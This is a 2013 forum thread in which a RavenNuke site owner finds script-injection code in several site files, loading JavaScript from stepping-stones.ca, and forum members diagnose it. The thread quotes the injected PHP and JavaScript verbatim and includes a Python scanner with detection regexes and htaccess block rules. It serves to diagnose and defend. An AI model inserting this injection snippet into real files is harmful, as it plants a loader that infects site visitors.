Ravens PHP Scripts: Forums
 

 

Ravens PHP Scripts And Web Hosting Forum Index -> RavenNuke(tm) v2.5x
Eduardo
Worker
Joined: Jul 20, 2004
Posts: 189
Location: Italy

PostPosted: Wed Oct 23, 2013 7:37 am

I installed version 2.51 a few weeks ago, but for a few days access via a search engine has been prevented by this annoying notice:

Danger: malware ahead!
Google Chrome has blocked access to this page on [link]
Content from stepping-stones.ca, a known malware distributor site, has been inserted into this web page. If you visit this page now, your computer could be infected with malware.
Malware is malicious software that can cause identity theft, financial loss and permanent deletion of files. Learn more
Back  Details on stepping-stones.ca  Proceed at your own risk «
Improve malware detection by sending additional data to Google when similar warnings are displayed. Privacy policy


http://www.continuummusicum.it/Warning_Google.pdf


In a preliminary investigation of the problem I found the following line of code:

Code:
/*339810*/
document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://stepping-stones.ca/modules/IR6Kh5cX.php" type="text/javascript"></script>')
/*/339810*/


I would like to understand whether it is a problem with the RavenNuke script or whether there are weaknesses in the server that hosts me.
 
neralex
Site Admin
Joined: Aug 22, 2007
Posts: 1548

PostPosted: Wed Oct 23, 2013 9:11 am

In which file have you found this code? This posted code and also the file IR6Kh5cX.php in the modules folder are not part of the RN 251 package!

Github: RavenNuke

Eduardo

PostPosted: Wed Oct 23, 2013 9:29 am

modules/GCalendar/displayCatLegend.js
 
Eduardo

PostPosted: Wed Oct 23, 2013 9:36 am

Also in header.php there is:
Code:
<?php

#339810#
if(empty($p)) {
$p = "<script type=\"text/javascript\">var gwloaded = false;</script>
<script src=\"http://stepping-stones.ca/modules/IR6Kh5cX.php\" type=\"text/javascript\"></script>";
echo $p;
}

#/339810#
?>
<?php

?>
<?php

?>
 
Eduardo

PostPosted: Wed Oct 23, 2013 9:43 am

In includes/nukesentinel1_2_3_4.js and in many other files there is always:

Quote:
/*339810*/
document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://stepping-stones.ca/modules/IR6Kh5cX.php" type="text/javascript"></script>')
/*/339810*/
 
neralex

PostPosted: Wed Oct 23, 2013 9:48 am

Looks like an attack, because this code isn't in either of these files in the RN251 package.

If you haven't made changes in these two files after the installation of RN251, then I would download the two infected files to store them, and after that I would overwrite both files with the original files from the download package of RN251.

I would also download the IR6Kh5cX.php and after that remove this file directly. Have you checked this file? What is the code in there?

Have you installed other modules after the installation of RN251? If yes, which modules?

Edit: OK, after I have seen your last posts, I would suggest you delete all files and start from scratch with the install. It seems your system is compromised. But here is the question again: have you installed other modules?
 
neralex

PostPosted: Wed Oct 23, 2013 10:12 am

OK, I have downloaded the IR6Kh5cX.php from the posted link. In there is a JavaScript function, part of the lightbox script. Inside the function it would open an iframe from the file gwframe2.html. Inside this HTML file there is also a JS function that shows an installation of the VLC player, but it would not install VLC. I haven't tried to download these exe files, but it seems this is infected stuff.
 
wHiTeHaT
Life Cycles Becoming CPU Cycles
Joined: Jul 18, 2004
Posts: 578
Location: Netherlands

PostPosted: Wed Oct 23, 2013 11:59 am

Somehow this gives me concerns.
I looked at your website and it seems you have not installed any 3rd-party modules, except RN Gallery.
Your your_account login is also infected:
[link]

Code:
var gwloaded = false; " />
 
neralex

PostPosted: Wed Oct 23, 2013 12:38 pm

OK, then it could be a provider issue, because none of the currently installed modules can write in the modules or includes folder. To create and change files with PHP it needs write access on files and folders.
 
nuken
RavenNuke(tm) Development Team
Joined: Mar 11, 2007
Posts: 2024
Location: North Carolina

PostPosted: Wed Oct 23, 2013 12:50 pm

It could be another site on a shared server that is infected which is also infecting your site. I have also heard of a Windows virus that attacks servers through FTP with an attack meant for WordPress sites.

Tricked Out News

Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 6795
Location: Ha Noi, Viet Nam

PostPosted: Wed Oct 23, 2013 2:13 pm

Also, please check the .htaccess file in your website root; in particular, look for "prepend".
 
Eduardo

PostPosted: Thu Oct 24, 2013 12:32 am

The inconvenience has occurred three times; I installed the script again without solving it.
The provider says that the problem is caused by some form of the script.
Following is the provider's letter:

Dear Customer,

With regard to your report, we have carried out the appropriate checks and identified some files into which malicious code has been inserted. We inform you that, from our analysis, we believe the cause to be Trojans that infect the client in order to "steal" sensitive data such as FTP access credentials and credit cards, and then use the former to infect other pages and spread the Trojan further.

We have placed in the root of your domain the file aruba.log, containing the list of corrupted files.

Among these Trojans are "Zeus", "Gumblar" and "Koobface", about which you can find detailed information at the following links from well-known security companies:
[link] [link] [link]
[link] [link] [link] [link]

As can be seen from these links, this malware infects client PCs and steals FTP access credentials, then later uses them en masse to perform code injections in order to infect the largest possible number of sites and so propagate the malware. We would like to stress that latest-generation Trojans such as those indicated are not detected by the major antivirus products, because they use infection techniques that modify the operating system "kernel", making themselves invisible.
[link]

At the URL indicated you will find a list of all the major antivirus products vulnerable to these kinds of malware.

"...The virus will find FTP clients such as FileZilla and Dreamweaver and download the clients' stored passwords. It also enabled promiscuous mode on the network card, allowing it to sniff local network traffic for FTP details. It is one of the first viruses to incorporate an automated network sniffer...

...using passwords obtained from site admins, the host site will access a website via FTP and infect the website...."

From this information and the checks carried out, we believe that the problem you encountered arises from this infection. We kindly invite you to perform a thorough scan of the workstations you use to manage your site with the following removal tool:
[link]

Should this software find infections on your workstation, we kindly ask you to provide us with the results and the name of the malware/Trojan found, so that we have more information on the matter.

Once this clean-up has been done, we invite you to change the password of your access credentials, so as to be certain that they are not among those used by those who created this botnet.
[link]

The new password must meet the following criteria:
- length between 8 and 13 characters;
- alphanumeric format (it must therefore contain both letters and numbers)
- different from passwords used previously

In addition, we recommend carrying out the usual operations to keep your PC secure, constantly updating the antivirus and anti-malware software you use.

For more information, please refer to the following article:
[link]

Please note that the SFTP, HTTPS, etc. security protocols have been implemented; we therefore invite you to configure your FTP client as per the instructions at the following link:
[link]

Finally, again to guarantee security, we inform you that the IP Filter is enabled, which allows only a restricted number of IPs to access FTP, so as to avoid access by malicious parties:
[link]

We remain at your disposal for any clarification.

Kind regards.
=====================
Luigi Carafa [link] [link]
switchboard no.: 0575/0505
fax no.: 0575 862000
=====================



I do not know what to do.
 
Eduardo

PostPosted: Thu Oct 24, 2013 12:57 am

Google, to get rid of this problem, forced me to place in the root a file with the following name:
www-continuummusicum-it_20131009T160221Z_MalwareUrlList.csv

The contents of the file are:

URL,Tipo,Ultimo controllo [link] [link] [link] [link] [link] [link]

24 hours after the insertion everything worked perfectly, but after only a few days the problem occurred again.

I cannot understand who authorizes Google to make this intervention.

I hope you manage to figure out what's going on!
 
Eduardo

PostPosted: Thu Oct 24, 2013 2:02 am

Guardian2003 wrote:
Also, please check the .htaccess file in your website root; in particular, look for "prepend".

In the root, the .htaccess file does not exist.
 
Eduardo

PostPosted: Thu Oct 24, 2013 2:07 am

nuken wrote:
It could be another site on a shared server that is infected which is also infecting your site. I have also heard of a Windows virus that attacks servers through FTP with an attack meant for WordPress sites.

The provider, [link], told me that the servers have not suffered any attack.
 
Eduardo

PostPosted: Thu Oct 24, 2013 2:13 am

wHiTeHaT wrote:
Somehow this gives me concerns.
I looked at your website and it seems you have not installed any 3rd-party modules, except RN Gallery.
Your your_account login is also infected:
[link]

Please, where can you find:

Code:
var gwloaded = false; " />
 
Eduardo

PostPosted: Thu Oct 24, 2013 4:29 am

This is the final consideration of the provider ARUBA:

Dear Customer,

With regard to your report, we inform you that we have carried out the appropriate checks and we believe that the hacking operations that led to the modification of your pages were made possible by some known vulnerabilities of the PHP Nuke CMS and of the components you use.

In order to prevent such events from recurring in future, we invite you to periodically consult security sites such as
[link] [link]

where newly discovered vulnerabilities are published for scripts such as, in this case, PHP Nuke and its components.


For your greater security, we invite you to request once more a change of the management password for your web space. You can change the management password for the [link] entirely on your own by logging in to our website at the address
[link]

The new password must meet the following criteria:
- length between 8 and 13 characters;
- alphanumeric format (it must therefore contain both letters and numbers)
- different from passwords used previously

To change the MySQL credentials, instead, refer to the following link:
[link]

In order to restore the correct visibility of your site as soon as possible, we invite you to reset your web space through the dedicated procedure:
[link]

to retrieve an uncorrupted backup copy in your possession and, subsequently, to restore all the files in the root of your site. Having done that, we invite you to update your PHP Nuke to the latest version, 8.2.

We remain at your disposal for any clarification.

Kind regards
=====================
Fabrizio Puce [link] [link]
switchboard no.: 0575/0505
fax no.: 0575 862000
=====================
 
Guardian2003

PostPosted: Thu Oct 24, 2013 5:05 am

If your PC is infected with the Koobface virus, it is extremely difficult to get rid of.

I'm not sure what to recommend for you. Your provider seems to think you are using php-nuke, which you are not, and they recommend "upgrading to php-nuke 8.2", which, considering you are not using php-nuke, is a bit silly, and there is NO difference anyway between 8.2, 8.1 and 7.9.

I also find it hard to believe they have not had any server attacks; I get around a dozen root access attacks every week, and there is not a public server anywhere in the world that doesn't get hack attempts.

This is going to be extremely difficult to diagnose and fix. If your computer is infected you'll need to get rid of that infection before trying to fix the website.
Please remember that it is highly likely that the infection is on another website on the server and is being transferred to your account.

I got rid of a similar problem on a client's website by downloading the files from the server and running Beyond Compare to compare the original files downloaded from here and the ones on the server (you need to make sure you have "show invisible files" turned on because, in my case, it was some code added to a htaccess file that was altering all the other files).
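The file comparison and the .htaccess "prepend" check described in this thread can be turned into a repeatable scan. The script below is an added example for this thread, not RavenNuke code and not anything the posters ran: it walks a web root, finds the numbered-marker blocks shown in the posts (the /*339810*/ ... /*/339810*/ form in JS files and the #339810# ... #/339810# form in PHP files), extracts the external script URL each one loads, flags a php_value auto_prepend_file directive in .htaccess, and can strip the blocks while first keeping a copy of each infected file, as neralex suggested. The marker value, the file names and the stepping-stones.ca URL come from the posts; the sample file contents, the example web root and the prepend path are constructed for the demo.

```python
# Added example for this thread, not RavenNuke code: scan a web root for the
# marker-wrapped injection shown in the posts, report the external script it
# loads, flag an auto_prepend_file directive in .htaccess, and optionally strip
# the blocks while keeping a copy of each infected file. The marker 339810, the
# file names and the stepping-stones.ca URL come from the thread; the sample
# file contents and the prepend path below are constructed for the demo.
import pathlib
import re
import shutil
import tempfile

# JS form: /*339810*/ ... /*/339810*/ (any numeric marker is accepted)
JS_BLOCK = re.compile(r"/\*(\d+)\*/\s*(.*?)\s*/\*/\1\*/\s*", re.DOTALL)
# PHP form: #339810# ... #/339810#, usually inside its own <?php ... ?> block
PHP_MARK = re.compile(r"#(\d+)#\s*(.*?)#/\1#\s*", re.DOTALL)
PHP_WRAPPED = re.compile(r"<\?php\s*#(\d+)#\s*(.*?)#/\1#\s*\?>\s*", re.DOTALL)
EMPTY_PHP = re.compile(r"<\?php\s*\?>\s*")  # empty pairs the injector leaves behind
# src="..." in JS, or the PHP-escaped src=\"...\" form
SCRIPT_SRC = re.compile(r'''src=\\?["']([^"'\\]+)''')
# auto_prepend_file makes PHP include a file before every script on the site
PREPEND = re.compile(r"^\s*php_(?:admin_)?value\s+auto_prepend_file\s+(\S+)",
                     re.MULTILINE | re.IGNORECASE)
SCAN_SUFFIXES = {".js", ".php", ".html", ".htm"}


def find_injections(text):
    """Return [(kind, marker, [urls])] for every marked block or prepend in text."""
    found = []
    for kind, pattern in (("js", JS_BLOCK), ("php", PHP_MARK)):
        for m in pattern.finditer(text):
            found.append((kind, m.group(1), SCRIPT_SRC.findall(m.group(2))))
    for m in PREPEND.finditer(text):
        found.append(("prepend", None, [m.group(1)]))
    return found


def clean_text(text):
    """Remove the marked blocks and leftover empty <?php ?> pairs; nothing else changes."""
    text = JS_BLOCK.sub("", text)
    text = PHP_WRAPPED.sub("", text)  # whole <?php #n# ... #/n# ?> block
    text = PHP_MARK.sub("", text)     # marker pair inside an existing PHP block
    return EMPTY_PHP.sub("", text)


def scan_tree(root):
    """Map relative path -> findings for every web file under root that has any."""
    root = pathlib.Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        if path.suffix.lower() not in SCAN_SUFFIXES and path.name != ".htaccess":
            continue
        findings = find_injections(path.read_text(errors="replace"))
        if findings:
            report[path.relative_to(root).as_posix()] = findings
    return report


def clean_file(path):
    """Keep a copy of the infected file beside it, then write the cleaned text.
    Returns True when the file changed. A prepend directive is only reported:
    .htaccess deserves a manual look rather than a regex edit."""
    path = pathlib.Path(path)
    original = path.read_text(errors="replace")
    cleaned = clean_text(original)
    if cleaned == original:
        return False
    shutil.copy2(path, path.with_name(path.name + ".infected.bak"))
    path.write_text(cleaned)
    return True


# Constructed samples modelled on the snippets posted in the thread.
SAMPLE_JS = (
    "/*339810*/\n"
    "document.write('<script type=\"text/javascript\">var gwloaded = false;</script>"
    "<script src=\"http://stepping-stones.ca/modules/IR6Kh5cX.php\""
    " type=\"text/javascript\"></script>')\n"
    "/*/339810*/\n"
    "function displayCatLegend() { return 'legend'; }\n"
)
SAMPLE_PHP = (
    "<?php\n\n#339810#\nif(empty($p)) {\n"
    "$p = \"<script type=\\\"text/javascript\\\">var gwloaded = false;</script>\n"
    "<script src=\\\"http://stepping-stones.ca/modules/IR6Kh5cX.php\\\""
    " type=\\\"text/javascript\\\"></script>\";\n"
    "echo $p;\n}\n\n#/339810#\n?>\n<?php\n\n?>\n"
    "<?php\n// legitimate header code follows\necho 'header';\n?>\n"
)
SAMPLE_HTACCESS = (
    "RewriteEngine on\n"
    # constructed: a prepend directive pointing at a hidden loader file
    "php_value auto_prepend_file /web/htdocs/example/.cache/loader.php\n"
)


def build_sample_tree():
    """Write the constructed samples into a throwaway web root and return its path."""
    root = pathlib.Path(tempfile.mkdtemp(prefix="rn251-scan-"))
    (root / "modules" / "GCalendar").mkdir(parents=True)
    (root / "modules" / "GCalendar" / "displayCatLegend.js").write_text(SAMPLE_JS)
    (root / "header.php").write_text(SAMPLE_PHP)
    (root / ".htaccess").write_text(SAMPLE_HTACCESS)
    (root / "includes").mkdir()
    (root / "includes" / "clean.js").write_text("var ok = 1;\n")
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for rel, findings in scan_tree(root).items():
        for kind, marker, refs in findings:
            print(f"{rel}: {kind} marker={marker} -> {refs}")
    js = root / "modules" / "GCalendar" / "displayCatLegend.js"
    print("cleaned displayCatLegend.js:", clean_file(js))
    print("re-scan:", scan_tree(root).get("modules/GCalendar/displayCatLegend.js", "clean"))
```

Run it against a downloaded copy of the site rather than in place, and compare the cleaned files with the RN251 package afterwards, since the regexes only know the marker style seen in this thread. It removes the injected blocks but does nothing about how they got there (stolen FTP credentials or a writable directory, both raised above), so it belongs after the password change, not instead of it.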
 
Guardian2003

PostPosted: Thu Oct 24, 2013 6:21 pm

You might also want to add something like this in your htaccess file to try and stop the JavaScript from the infected site firing:
Code:
RewriteEngine on
RewriteCond %{HTTP_REFERER} stepping-stones\.ca [NC]
RewriteRule .* - [F]

Or you could block the IP of that website:
Code:
deny from 74.220.215.75
 
Eduardo

PostPosted: Sat Oct 26, 2013 1:40 am

Guardian2003 wrote:
Or you could block the IP of that website:
deny from 74.220.215.75

Should I do this action with the Sentinel module?

Via the Blocked IP menu?
 
misterstereus
Hangin' Around
Joined: Aug 03, 2012
Posts: 47
Location: Rome Italy

PostPosted: Sat Oct 26, 2013 2:11 am

Eduardo, add me on Skype; search misterstereus.
 
Guardian2003

PostPosted: Sat Oct 26, 2013 11:25 am

Eduardo, you can add it directly in your htaccess file:
Code:
# -------------------------------------------
# Start of NukeSentinel(tm) DENY FROM area
# -------------------------------------------
deny from 74.220.215.75

If NukeSentinel is set up correctly and can write to your htaccess file, then you can use the NS IP blocker and it will automatically add the code to your htaccess file.
 
Eduardo

PostPosted: Sun Oct 27, 2013 3:26 am

Please, tell me if the following setting is correct:

If everything is OK, what should I do?

Last edited by Eduardo on Mon Oct 28, 2013 2:01 am; edited 1 time in total
hicuxunicorniobestbuildpc
The Mouse Is Extension Of Arm
Joined: Aug 13, 2009
Posts: 1015
Location: Netherland

PostPosted: Sun Oct 27, 2013 4:05 am

No Eduardo, this is not correct. Since you are running PHP as CGI, you need to fill all the empty fields at the bottom with these lines and SAVE CHANGES:

Code:
/web/htdocs/www.continuummusicum.it/home/.htaccess
/web/htdocs/www.continuummusicum.it/home/.staccess
/web/htdocs/www.continuummusicum.it/home/.ftaccess
 
Eduardo

PostPosted: Sun Oct 27, 2013 4:15 am

Please, if

Admin Auth: off

is it correct to fill only:

htaccess Path: /web/htdocs/www.continuummusicum.it/home/.htaccess ?

or leave all empty?
 
All times are GMT - 6 Hours